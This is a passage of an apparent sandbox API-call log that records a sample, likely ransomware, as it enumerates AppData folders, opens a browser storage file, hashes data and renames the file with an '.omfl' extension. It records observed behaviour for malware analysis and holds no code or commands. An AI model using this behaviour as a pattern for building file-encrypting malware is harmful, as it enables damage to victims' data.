ftLastAccessTime.dwLowDateTime=0x605dd8a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x696aec80, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xd, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="www.google[1].xml", cAlternateFileName="WWWGOO~1.XML")) returned 0 [0135.197] FindClose (in: hFindFile=0xdce3b70 | out: hFindFile=0xdce3b70) returned 1 [0135.197] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750ca80 | out: hHeap=0x4970000) returned 1 [0135.197] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e6e10 | out: hHeap=0x4970000) returned 1 [0135.197] PeekMessageW (in: lpMsg=0xe00ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00ff08) returned 0 [0135.197] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0135.197] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\UV0DUWVB\\") returned="UV0DUWVB\\" [0135.197] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\") returned="DOMStore\\" [0135.197] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\") returned="Internet Explorer\\" [0135.197] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\") returned="Microsoft\\" [0135.197] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0135.198] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0135.198] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0135.198] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0135.198] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8f58 | out: hHeap=0x4970000) returned 1 [0135.198] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0135.198] PathFindFileNameW (pszPath="") returned="" [0135.198] PeekMessageW (in: lpMsg=0xe00ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00ff08) returned 0 [0135.198] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0135.198] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\VGMTOI09\\") returned="VGMTOI09\\" [0135.198] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\") returned="DOMStore\\" [0135.198] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\") returned="Internet Explorer\\" [0135.198] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\") returned="Microsoft\\" [0135.198] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0135.198] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0135.198] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0135.199] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0135.199] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8f58 | out: hHeap=0x4970000) returned 1 [0135.199] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0135.199] PathFindFileNameW (pszPath="") returned="" [0135.199] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\VGMTOI09\\www.msn[1].xml") returned=".xml" [0135.199] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\VGMTOI09\\www.msn[1].xml" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\vgmtoi09\\www.msn[1].xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x610 [0135.200] GetFileSizeEx (in: hFile=0x610, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=836) returned 1 [0135.200] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0135.203] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d2e68) returned 1 [0135.204] CryptCreateHash (in: hProv=0x49d2e68, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0135.204] CryptHashData (hHash=0xdce37f0, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0135.204] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0135.204] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0135.204] GetLastError () returned 0x0 [0135.204] CryptDestroyHash (hHash=0xdce37f0) returned 1 [0135.204] CryptReleaseContext (hProv=0x49d2e68, dwFlags=0x0) returned 1 [0135.204] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0bd00 | out: hHeap=0x4970000) returned 1 [0135.204] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0135.204] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0135.205] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0135.205] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0135.205] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\VGMTOI09\\www.msn[1].xml" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\vgmtoi09\\www.msn[1].xml"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\VGMTOI09\\www.msn[1].xml.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\vgmtoi09\\www.msn[1].xml.omfl")) returned 1 [0135.206] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74fb288 | out: hHeap=0x4970000) returned 1 [0135.206] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0135.206] VirtualFree (lpAddress=0x6ec0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.207] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0cd00 | out: hHeap=0x4970000) returned 1 [0135.207] FindNextFileW (in: hFindFile=0xdce3b70, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x510b3550, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x510b3550, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x52878dd0, ftLastWriteTime.dwHighDateTime=0x1d2faf3, nFileSizeHigh=0x0, nFileSizeLow=0x344, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="www.msn[1].xml", cAlternateFileName="WWWMSN~1.XML")) returned 0 [0135.207] FindClose (in: hFindFile=0xdce3b70 | out: hFindFile=0xdce3b70) returned 1 [0135.207] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750ca80 | out: hHeap=0x4970000) returned 1 [0135.207] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e6e10 | out: hHeap=0x4970000) returned 1 [0135.207] PeekMessageW (in: lpMsg=0xe00ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00ff08) returned 0 [0135.207] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0135.208] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\security\\") returned="security\\" [0135.208] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\") returned="Deployment\\" [0135.208] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\") returned="Java\\" [0135.208] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\") returned="Sun\\" [0135.208] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0135.208] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0135.208] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0135.208] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0135.208] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8f58 | out: hHeap=0x4970000) returned 1 [0135.208] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0135.208] PathFindFileNameW (pszPath="") returned="" [0135.209] PeekMessageW (in: lpMsg=0xe00ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00ff08) returned 0 [0135.209] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0135.209] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\tmp\\") returned="tmp\\" [0135.209] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\") returned="Deployment\\" [0135.210] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\") returned="Java\\" [0135.210] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\") returned="Sun\\" [0135.210] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0135.210] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0135.210] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0135.210] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0135.210] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8f58 | out: hHeap=0x4970000) returned 1 [0135.210] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0135.210] PathFindFileNameW (pszPath="") returned="" [0135.210] PeekMessageW (in: lpMsg=0xe00ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00ff08) returned 0 [0135.210] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf0e18 | out: hHeap=0x4970000) returned 1 [0135.210] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd1dd18 | out: hHeap=0x4970000) returned 1 [0135.210] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e6d48 | out: hHeap=0x4970000) returned 1 [0135.210] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e6bb8 | out: hHeap=0x4970000) returned 1 [0135.210] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e7068 | out: hHeap=0x4970000) returned 1 [0135.210] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e7130 | out: hHeap=0x4970000) returned 1 [0135.210] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf0cc8 | out: hHeap=0x4970000) returned 1 [0135.210] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd14728 | out: hHeap=0x4970000) returned 1 [0135.210] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24260 | out: hHeap=0x4970000) returned 1 [0135.210] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0135.211] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\all\\") returned="all\\" [0135.211] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\") returned="Adobe Custom Dictionary\\" [0135.211] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\") returned="Dictionaries\\" [0135.211] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\") returned="Linguistics\\" [0135.211] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\") returned="Adobe\\" [0135.211] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0135.211] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0135.211] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0135.211] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0135.211] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8f58 | out: hHeap=0x4970000) returned 1 [0135.211] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0135.211] PathFindFileNameW (pszPath="") returned="" [0135.212] PeekMessageW (in: lpMsg=0xe00ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00ff08) returned 0 [0135.212] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0135.212] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\brt\\") returned="brt\\" [0135.212] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\") returned="Adobe Custom Dictionary\\" [0135.212] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\") returned="Dictionaries\\" [0135.212] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\") returned="Linguistics\\" [0135.212] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\") returned="Adobe\\" [0135.212] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0135.212] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0135.213] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0135.213] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0135.213] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8f58 | out: hHeap=0x4970000) returned 1 [0135.213] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0135.213] PathFindFileNameW (pszPath="") returned="" [0135.214] PeekMessageW (in: lpMsg=0xe00ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00ff08) returned 0 [0135.214] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0135.214] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\brz\\") returned="brz\\" [0135.214] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\") returned="Adobe Custom Dictionary\\" [0135.214] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\") returned="Dictionaries\\" [0135.214] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\") returned="Linguistics\\" [0135.214] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\") returned="Adobe\\" [0135.214] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0135.214] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0135.214] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0135.214] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0135.214] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8f58 | out: hHeap=0x4970000) returned 1 [0135.214] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0135.214] PathFindFileNameW (pszPath="") returned="" [0135.215] PeekMessageW (in: lpMsg=0xe00ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00ff08) returned 0 [0135.215] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0135.215] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\dan\\") returned="dan\\" [0135.215] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\") returned="Adobe Custom Dictionary\\" [0135.216] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\") returned="Dictionaries\\" [0135.216] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\") returned="Linguistics\\" [0135.216] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\") returned="Adobe\\" [0135.216] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0135.216] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0135.216] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0135.216] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0135.216] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8f58 | out: hHeap=0x4970000) returned 1 [0135.216] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0135.216] PathFindFileNameW (pszPath="") returned="" [0135.216] PeekMessageW (in: lpMsg=0xe00ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00ff08) returned 0 [0135.216] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0135.216] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\dut\\") returned="dut\\" [0135.216] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\") returned="Adobe Custom Dictionary\\" [0135.217] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\") returned="Dictionaries\\" [0135.217] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\") returned="Linguistics\\" [0135.217] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\") returned="Adobe\\" [0135.217] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0135.217] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0135.217] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0135.217] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0135.217] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8f58 | out: hHeap=0x4970000) returned 1 [0135.217] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0135.217] PathFindFileNameW (pszPath="") returned="" [0135.217] PeekMessageW (in: lpMsg=0xe00ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00ff08) returned 0 [0135.217] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0135.217] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\eng\\") returned="eng\\" [0135.217] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\") returned="Adobe Custom Dictionary\\" [0135.217] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\") returned="Dictionaries\\" [0135.217] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\") returned="Linguistics\\" [0135.218] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\") returned="Adobe\\" [0135.218] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0135.218] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0135.218] PeekMessageW (in: lpMsg=0xe00ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00ff08) returned 0 [0135.218] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0135.218] PeekMessageW (in: lpMsg=0xe00ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00ff08) returned 0 [0135.218] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0135.219] PeekMessageW (in: lpMsg=0xe00ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00ff08) returned 0 [0135.219] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0135.219] PeekMessageW (in: lpMsg=0xe00ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00ff08) returned 0 [0135.219] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0135.219] PeekMessageW (in: lpMsg=0xe00ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00ff08) returned 0 [0135.219] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0135.219] PeekMessageW (in: lpMsg=0xe00ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00ff08) returned 0 [0135.219] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0135.220] PeekMessageW (in: lpMsg=0xe00ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00ff08) returned 0 [0135.220] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0135.220] PeekMessageW (in: lpMsg=0xe00ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00ff08) returned 0 [0135.220] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: 